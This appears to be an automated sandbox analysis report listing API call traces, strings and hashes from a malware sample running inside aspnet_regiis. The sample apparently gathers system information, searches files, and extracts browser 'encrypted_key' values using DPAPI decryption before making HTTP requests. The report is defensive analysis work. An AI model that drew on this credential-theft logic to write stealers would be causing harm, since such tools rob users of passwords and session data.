                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,75BF74F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75BF74F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CreatePointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2024441833-0
                                                                                                                                                                    • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                                    • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                                                                                                                    • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                                    • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C7AC947
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C7AC969
                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C7AC9A9
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C7AC9C8
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C7AC9E2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4191843772-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                    • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CrackInternetlstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1274457161-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3466090806-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                      • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                                                                                    Strings
                                                                                                                                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                    • API String ID: 2929475105-1193256905
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                                                                                    • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                    • String ID: ERROR
                                                                                                                                                                    • API String ID: 591506033-2861137601
                                                                                                                                                                    • Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                                                                    • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                                                                                                                    • Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                                                                    • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                    • String ID: =A
                                                                                                                                                                    • API String ID: 3183270410-2399317284
                                                                                                                                                                    • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                                                                    • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                                                                                                                    • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3D7
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 211194620-0
                                                                                                                                                                    • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                                    • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                                                                                                    • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                                    • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                      • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                    • API String ID: 161838763-3310892237
                                                                                                                                                                    • Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                                                                    • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                                                                                                    • Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                                                                    • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                      • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                                      • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                                                                      • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                                                                      • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                                                                      • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                                                                      • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                      • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                                      • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                    • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                    • API String ID: 2311102621-738592651
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                                                                      • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                                                                      • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                                                                      • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                                                                      • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                                                                      • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                                                                      • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                                                                      • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                                                                      • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                                                                      • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                    • String ID: nzA
                                                                                                                                                                    • API String ID: 2104210347-1761861442
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                      • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                      • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                      • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                      • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                      • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                      • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                    • String ID: ERROR$ERROR
                                                                                                                                                                    • API String ID: 3086566538-2579291623
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4198075804-0
                                                                                                                                                                    • Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                                                                    • Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
                                                                                                                                                                    • Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                                                                    • Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1065093856-0
                                                                                                                                                                    • Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                                                                    • Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
                                                                                                                                                                    • Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                                                                    • Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C793095
                                                                                                                                                                      • Part of subcall function 6C7935A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C81F688,00001000), ref: 6C7935D5
                                                                                                                                                                      • Part of subcall function 6C7935A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7935E0
                                                                                                                                                                      • Part of subcall function 6C7935A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C7935FD
                                                                                                                                                                      • Part of subcall function 6C7935A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C79363F
                                                                                                                                                                      • Part of subcall function 6C7935A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C79369F
                                                                                                                                                                      • Part of subcall function 6C7935A0: __aulldiv.LIBCMT ref: 6C7936E4
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C79309F
                                                                                                                                                                      • Part of subcall function 6C7B5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B85
                                                                                                                                                                      • Part of subcall function 6C7B5B50: EnterCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B90
                                                                                                                                                                      • Part of subcall function 6C7B5B50: LeaveCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5BD8
                                                                                                                                                                      • Part of subcall function 6C7B5B50: GetTickCount64.KERNEL32 ref: 6C7B5BE4
